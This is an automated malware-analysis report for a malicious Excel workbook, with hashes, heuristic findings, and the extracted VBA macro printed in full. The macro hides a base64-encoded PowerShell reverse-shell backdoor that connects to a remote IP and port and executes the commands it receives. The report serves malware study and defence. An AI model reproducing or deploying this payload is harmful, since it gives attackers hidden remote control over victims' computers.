Office (OOXML) malware analysis — malicious · 7727216d59d3b268

MALICIOUS

Office (OOXML)

83.3 KB Created: 2021-11-02 02:43:16 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-11-20

MD5: 5624e572577eb4582fa1e2a90f8ea07f SHA-1: cfc74296dd69f579809a3fcb9ce8933a4bee56c4 SHA-256: 7727216d59d3b2682f3be6da7abfdb27dcbbb2d774585a58d4bbdac5c2c93d65

100 Risk Score

Heuristics 3

VBA project inside OOXML medium 1 related finding OOXML_VBA

Document contains a VBA project — VBA macros present

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

Dim str As String
str = str + "powershell.exe -nop -w hidden -e VwByAGkAdABlAC0AS"
str = str + "ABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA"

External relationship medium OOXML_EXTERNAL_REL

External target in xl/externalLinks/_rels/externalLink2.xml.rels: Ginno_BCC tháng 6.xls

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	10544 bytes
SHA-256: `7666174d91cc5b7d184523e0f96c4a3b2a98acbffaf55d7a49630f9e0d3a1065`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Macro1() Attribute Macro1.VB_ProcData.VB_Invoke_Func = " \n14" Dim str As String str = str + "powershell.exe -nop -w hidden -e VwByAGkAdABlAC0AS" str = str + "ABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA" str = str + "jACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjA" str = str + "CMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACM" str = str + "AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAI" str = str + "wAjACMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwA" str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA" str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA" str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI" str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwB" str = str + "yAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgA" str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAG8" str = str + "AdwBlAHIAUwBoAGUAbABsACAAUgBlAHYAZQByAHMAZQAgAFQAQ" str = str + "wBQACAAdgAzAC4ANQAgACAAIAAgACAAIAAgACAAIAAgACAAIAA" str = str + "gACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGkAdABlAC0ASABvA" str = str + "HMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA" str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI" str = str + "AAgACAAIAAgACAAIAAgACAAIABiAHkAIABJAHYAYQBuACAAUwB" str = str + "pAG4AYwBlAGsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA" str = str + "CMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACA" str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI" str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA" str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA" str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGk" str = str + "AdABlAC0ASABvAHMAdAAgACIAIwAgAEcAaQB0AEgAdQBiACAAc" str = str + "gBlAHAAbwBzAGkAdABvAHIAeQAgAGEAdAAgAGcAaQB0AGgAdQB" str = str + "iAC4AYwBvAG0ALwBpAHYAYQBuAC0AcwBpAG4AYwBlAGsALwBwA" str = str + "G8AdwBlAHIAcwBoAGUAbABsAC0AcgBlAHYAZQByAHMAZQAtAHQ" str = str + "AYwBwAC4AIAAgACMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAd" str = str + "AAgACIAIwAgAEYAZQBlAGwAIABmAHIAZQBlACAAdABvACAAZAB" str = str + "vAG4AYQB0AGUAIABiAGkAdABjAG8AaQBuACAAYQB0ACAAMQBCA" str = str + "HIAWgBNADYAVAA3AEcAOQBSAE4AOAB2AGIAYQBiAG4AZgBYAHU" str = str + "ANABNADYATABwAGcAegB0AHEANgBZADEANAAuACAAIAAgACMAI" str = str + "gA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAA" str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA" str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA" str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI" str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGkAdAB" str = str + "lAC0ASABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjA" str = str + "CMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACM" str = str + "AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAI" str = str + "wAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA" str = str + "jACMAIwAjACMAIgA7AAoAJABjAGwAaQBlAG4AdAAgAD0AIAAkA" str = str + "G4AdQBsAGwAOwAKACQAcwB0AHIAZQBhAG0AIAA9ACAAJABuAHU" str = str + "AbABsADsACgAkAGIAdQBmAGYAZQByACAAPQAgACQAbgB1AGwAb" str = str + "AA7AAoAJAB3AHIAaQB0AGUAcgAgAD0AIAAkAG4AdQBsAGwAOwA" str = str + "KACQAZABhAHQAYQAgAD0AIAAkAG4AdQBsAGwAOwAKACQAcgBlA" str = str + "HMAdQBsAHQAIAA9ACAAJABuAHUAbABsADsACgB0AHIAeQAgAHs" str = str + "ACgAJACMAIABjAGgAYQBuAGcAZQAgAHQAaABlACAAaABvAHMAd" str = str + "AAgAGEAZABkAHIAZQBzAHMAIABhAG4AZAAvAG8AcgAgAHAAbwB" str = str + "yAHQAIABuAHUAbQBiAGUAcgAgAGEAcwAgAG4AZQBjAGUAcwBzA" str = str + "GEAcgB5AAoACQAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0" str = str + "ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMAL" str = str + "gBUAGMAcABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAuADEAMQA" str = str + "wAC4AMQAxACIALAAgADgAOAA4ADkAKQA7AAoACQAkAHMAdAByA" str = str + "GUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQ" str = str + "AcgBlAGEAbQAoACkAOwAKAAkAJABiAHUAZgBmAGUAcgAgAD0AI" str = str + "ABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAA" str = str + "xADAAMgA0ADsACgAJACQAZQBuAGMAbwBkAGkAbgBnACAAPQAgA" str = str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAGUAeAB0AC4AQQBzAGM" str = str + "AaQBpAEUAbgBjAG8AZABpAG4AZwA7AAoACQAkAHcAcgBpAHQAZ" str = str + "QByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgB" str = str + "TAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhA" str = str + "G0AKQA7AAoACQAkAHcAcgBpAHQAZQByAC4AQQB1AHQAbwBGAGw" str = str + "AdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsACgAJAFcAcgBpAHQAZ" str = str + "QAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAGkAcwA" str = str + "gAHUAcAAgAGEAbgBkACAAcgB1AG4AbgBpAG4AZwAuAC4ALgAiA" str = str + "DsACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAKAAk" str = str + "AJABiAHkAdABlAHMAIAA9ACAAMAA7AAoACQBkAG8AIAB7AAoAC" str = str + "QAJACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUAKAAiAFAAUwA" str = str + "+ACIAKQA7AAoACQAJAGQAbwAgAHsACgAJAAkACQAkAGIAeQB0A" str = str + "GUAcwAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQ" str = str + "AYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIAL" str = str + "gBMAGUAbgBnAHQAaAApADsACgAJAAkACQBpAGYAIAAoACQAYgB" str = str + "5AHQAZQBzACAALQBnAHQAIAAwACkAIAB7AAoACQAJAAkACQAkA" str = str + "GQAYQB0AGEAIAA9ACAAJABkAGEAdABhACAAKwAgACQAZQBuAGM" str = str + "AbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAd" str = str + "QBmAGYAZQByACwAIAAwACwAIAAkAGIAeQB0AGUAcwApADsACgA" str = str + "JAAkACQB9AAoACQAJAH0AIAB3AGgAaQBsAGUAIAAoACQAcwB0A" str = str + "HIAZQBhAG0ALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACk" str = str + "AOwAKAAkACQBpAGYAIAAoACQAYgB5AHQAZQBzACAALQBnAHQAI" str = str + "AAwACkAIAB7AAoACQAJAAkAJABkAGEAdABhACAAPQAgACQAZAB" str = str + "hAHQAYQAuAFQAcgBpAG0AKAApADsACgAJAAkACQBpAGYAIAAoA" str = str + "CQAZABhAHQAYQAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACk" str = str + "AIAB7AAoACQAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAAkAJ" str = str + "AByAGUAcwB1AGwAdAAgAD0AIABJAG4AdgBvAGsAZQAtAEUAeAB" str = str + "wAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAkA" str = str + "GQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHI" str = str + "AaQBuAGcAOwAKAAkACQAJAAkAfQAgAGMAYQB0AGMAaAAgAHsAC" str = str + "gAJAAkACQAJAAkAJAByAGUAcwB1AGwAdAAgAD0AIAAkAF8ALgB" str = str + "FAHgAYwBlAHAAdABpAG8AbgAgAHwAIABPAHUAdAAtAFMAdAByA" str = str + "GkAbgBnADsACgAJAAkACQAJAH0ACgAJAAkACQAJAEMAbABlAGE" str = str + "AcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZ" str = str + "ABhAHQAYQAiADsACgAJAAkACQAJACQAbABlAG4AZwB0AGgAIAA" str = str + "9ACAAJAByAGUAcwB1AGwAdAAuAEwAZQBuAGcAdABoADsACgAJA" str = str + "AkACQAJAGkAZgAgACgAJABsAGUAbgBnAHQAaAAgAC0AZwB0ACA" str = str + "AMAApACAAewAKAAkACQAJAAkACQAkAGMAbwB1AG4AdAAgAD0AI" str = str + "AAwADsACgAJAAkACQAJAAkAZABvACAAewAKAAkACQAJAAkACQA" str = str + "JAGkAZgAgACgAJABsAGUAbgBnAHQAaAAgAC0AZwBlACAAJABiA" str = str + "HUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAIAB7ACAAJABiAHk" str = str + "AdABlAHMAIAA9ACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAd" str = str + "ABoADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAGIAeQB0AGUAcwA" str = str + "gAD0AIAAkAGwAZQBuAGcAdABoADsAIAB9AAoACQAJAAkACQAJA" str = str + "AkAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACQAcgBlAHM" str = str + "AdQBsAHQALgBzAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAHUAb" str = str + "gB0ACwAIAAkAGIAeQB0AGUAcwApACkAOwAKAAkACQAJAAkACQA" str = str + "JACQAYwBvAHUAbgB0ACAAKwA9ACAAJABiAHkAdABlAHMAOwAKA" str = str + "AkACQAJAAkACQAJACQAbABlAG4AZwB0AGgAIAAtAD0AIAAkAGI" str = str + "AeQB0AGUAcwA7AAoACQAJAAkACQAJAH0AIAB3AGgAaQBsAGUAI" str = str + "AAoACQAbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQA7AAoACQA" str = str + "JAAkACQAJAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgA" str = str + "C0ATgBhAG0AZQAgACIAcgBlAHMAdQBsAHQAIgA7AAoACQAJAAk" str = str + "ACQB9AAoACQAJAAkAfQAKAAkACQB9AAoACQB9ACAAdwBoAGkAb" str = str + "ABlACAAKAAkAGIAeQB0AGUAcwAgAC0AZwB0ACAAMAApADsACgA" str = str + "JAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvA" str = str + "G8AcgAgAHcAaQBsAGwAIABuAG8AdwAgAGUAeABpAHQALgAuAC4" str = str + "AIgA7AAoAfQAgAGMAYQB0AGMAaAAgAHsACgAJAFcAcgBpAHQAZ" str = str + "QAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgA" str = str + "uAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzA" str = str + "HMAYQBnAGUAOwAKAH0AIABmAGkAbgBhAGwAbAB5ACAAewAKAAk" str = str + "AaQBmACAAKAAkAHcAcgBpAHQAZQByACAALQBuAGUAIAAkAG4Ad" str = str + "QBsAGwAKQAgAHsACgAJAAkAJAB3AHIAaQB0AGUAcgAuAEMAbAB" str = str + "vAHMAZQAoACkAOwAKAAkACQAkAHcAcgBpAHQAZQByAC4ARABpA" str = str + "HMAcABvAHMAZQAoACkAOwAKAAkACQBDAGwAZQBhAHIALQBWAGE" str = str + "AcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHcAcgBpAHQAZ" str = str + "QByACIAOwAKAAkAfQAKAAkAaQBmACAAKAAkAHMAdAByAGUAYQB" str = str + "tACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgAJAAkAJABzA" str = str + "HQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAKAAkACQAkAHM" str = str + "AdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwAKAAkAC" str = str + "QBDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQB" str = str + "tAGUAIAAiAHMAdAByAGUAYQBtACIAOwAKAAkAfQAKAAkAaQBmA" str = str + "CAAKAAkAGMAbABpAGUAbgB0ACAALQBuAGUAIAAkAG4AdQBsAGw" str = str + "AKQAgAHsACgAJAAkAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZ" str = str + "QAoACkAOwAKAAkACQAkAGMAbABpAGUAbgB0AC4ARABpAHMAcAB" str = str + "vAHMAZQAoACkAOwAKAAkACQBDAGwAZQBhAHIALQBWAGEAcgBpA" str = str + "GEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGMAbABpAGUAbgB0ACI" str = str + "AOwAKAAkAfQAKAAkAaQBmACAAKAAkAGIAdQBmAGYAZQByACAAL" str = str + "QBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgAJAAkAJABiAHUAZgB" str = str + "mAGUAcgAuAEMAbABlAGEAcgAoACkAOwAKAAkACQBDAGwAZQBhA" str = str + "HIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGI" str = str + "AdQBmAGYAZQByACIAOwAKAAkAfQAKAAkAaQBmACAAKAAkAHIAZ" str = str + "QBzAHUAbAB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgA" str = str + "JAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOA" str = str + "GEAbQBlACAAIgByAGUAcwB1AGwAdAAiADsACgAJAH0ACgAJAGk" str = str + "AZgAgACgAJABkAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAK" str = str + "QAgAHsACgAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbAB" str = str + "lACAALQBOAGEAbQBlACAAIgBkAGEAdABhACIAOwAKAAkAfQAKA" str = str + "AkAWwBTAHkAcwB0AGUAbQAuAEcAQwBdADoAOgBDAG8AbABsAGU" str = str + "AYwB0ACgAKQA7AAoAfQAKAA==" End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	27648 bytes
SHA-256: `d454e365ad2d972d7d70df1a45e7cced71adc0cef9401c4554ad8027a8ad7ddd`

Open this report in the interactive analyzer, or submit your own file for analysis.